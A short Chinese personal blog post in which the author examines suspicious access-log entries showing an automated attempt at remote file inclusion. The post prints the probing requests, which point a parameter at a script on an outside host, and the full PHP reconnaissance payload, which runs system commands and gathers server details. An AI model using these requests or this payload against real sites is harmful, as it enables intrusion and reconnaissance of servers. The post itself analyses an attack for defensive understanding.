很荣幸!竟然有人来检测这个Blog啦
日志里发现的可疑记录:
66.98.140.99 – - [06/Jun/2008:08:52:32 +0800] “GET /map/sitemap.xml/playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 404 3483 “-” “libwww-perl/5.65″
66.98.140.99 – - [06/Jun/2008:08:52:32 +0800] “GET /playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 302 592 “-” “libwww-perl/5.65″
66.98.140.99 – - [06/Jun/2008:08:52:36 +0800] “GET /playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 404 11767 “-” “libwww-perl/5.65″
66.98.140.99 – - [06/Jun/2008:08:52:38 +0800] “GET /map/playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 302 596 “-” “libwww-perl/5.65″
66.98.140.99 – - [06/Jun/2008:08:52:38 +0800] “GET /map/playing.php/common/db.php?commonpath=http://moshow.co.il/language/id.txt? HTTP/1.0″ 404 11771 “-” “libwww-perl/5.65″
去看啦眼那个id.txt文件,是个php的,可能以为这个blog有文件包含漏洞就来试探试探(难道我有符合哪些批量挖掘漏洞的“关键字”页面)?
那个id.txt如果成功执行的话可以探测出:
web服务器系统的名称 版本号 机子名
操作系统类别,比如winnt,linux
系统运行时间
..
程序(本blog)安装目录
Php版本号
web服务器程序版本号getenv(“SERVER_SOFTWARE”);
server-name(服务器名称) $_SERVER['SERVER_NAME'];
服务器ip
空闲空间
已经使用的空间
一共的空间
更详细的还是看看他的这个php代码吧
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "kangkung<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "kangkung was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

新鲜评论